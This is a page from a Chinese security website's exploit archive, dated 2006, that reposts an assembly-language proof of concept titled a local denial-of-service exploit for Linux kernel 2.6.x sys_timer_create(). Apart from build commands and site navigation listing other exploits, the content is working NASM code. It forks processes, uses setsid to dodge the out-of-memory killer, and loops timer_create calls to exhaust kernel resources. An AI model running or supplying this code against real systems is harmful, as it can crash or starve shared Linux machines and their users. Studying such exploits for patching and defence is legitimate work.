首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux Kernel 2.6.x sys_timer_create() Local Denial of Service Exploit
来源:www.vfocus.net 作者:vfocus 发布时间:2006-04-10  

;nasm -f elf noHeaven.asm
;ld -s -o noHeaven noHeaven.o

section .text
global _start

count equ 8 ; threads count - do it quicker

_start:
mov ebx, count
call create_threads
jmp done
_pause:
mov eax,29
int 0x80
ret
create_threads:
mov eax,2
int 0x80
test eax,eax
jz consume
dec ebx
test ebx,ebx
jnz create_threads
ret
consume:
setsid: ; so we won't get counted as one thread in oom_killer()
xor ebx,ebx ; each task will have about 20 oom_score which
mov eax,66 ; is less than 'init' and others
int 0x80
push eax
loopek:
mov eax,259
mov ebx,0
mov ecx,0
mov edx,esp
int 0x80
jmp loopek
done:
xor ebx,ebx
mov eax,1
int 0x80



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·XBrite Members <= 1.1 (id)
·w3wp remote DoS exploit due to
·ADODB < 4.70 (PhpOpenChat 3
·PHPList <= 2.10.2 GLOBALS[]
·ADODB < 4.70 (tmssql.php) D
·Horde <= 3.0.9, 3.1.0 (Help
·Horde Help Viewer <= 3.1 Re
·phpBB <= 2.0.19 (user_sig_b
·phpMyChat <= 0.14.5 (SYS en
·ClansyS 1.1 (showid) Remote SQ
·SQuery versions less than or e
·Simplog <= 0.9.2 (s) Remote
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved